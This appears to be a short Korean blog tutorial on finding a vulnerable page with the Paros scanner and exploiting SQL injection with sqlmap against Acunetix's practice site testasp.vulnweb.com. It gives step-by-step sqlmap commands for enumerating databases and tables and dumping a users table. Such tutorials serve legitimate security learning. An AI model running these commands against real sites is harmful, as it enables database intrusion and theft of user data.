[Paros + sqlmap 사용법]

 

 

 

1. Paros로 페이지 크롤링 > 스캔 폴리시 공격 유형 설정 > 스캔

: 스캔 결과 중 취약한 페이지를 타켓을 지정

ex) target URL : testasp.vulnweb.com/showforum.asp?id=2

 

 

 

2. OS Version/DB Version

# sqlmap -u testasp.vulnweb.com/showforum.asp?id=2

 

 

 

 

 

3. 웹 사용자(EX: accunetix)

# sqlmap -u testasp.vulnweb.com/showforum.asp?id=2 --batch --current-user

 

 

 

 

 

 

4. DB 이름(EX: accunetix)

# sqlmap -u testasp.vulnweb.com/showforum.asp?id=2 --batch --dbs

 

 

 

 

5. acuforum DB의 테이블 확인

# sqlmap -u testasp.vulnweb.com/showforum.asp?id=2 --tables -D acuforum --batch

 

 

 

 

 

6. 확인된 테이블 중 dbo.users의 모든 정보(옵션 dump)를 확인

# sqlmap -u testasp.vulnweb.com/showforum.asp?id=2 --dump -T dbo.users -D acuforum --batch

 

 

 

 

Table 이름(EX: users)

# sqlmap -u testasp.vulnweb.com/showforum.asp?id=2 --batch -D accunetix --tables

# sqlmap -u testasp.vulnweb.com/showforum.asp?id=2 --batch -D accunetix -T dbo.users --dump

 

 

 

 

 

728x90
반응형

+ Recent posts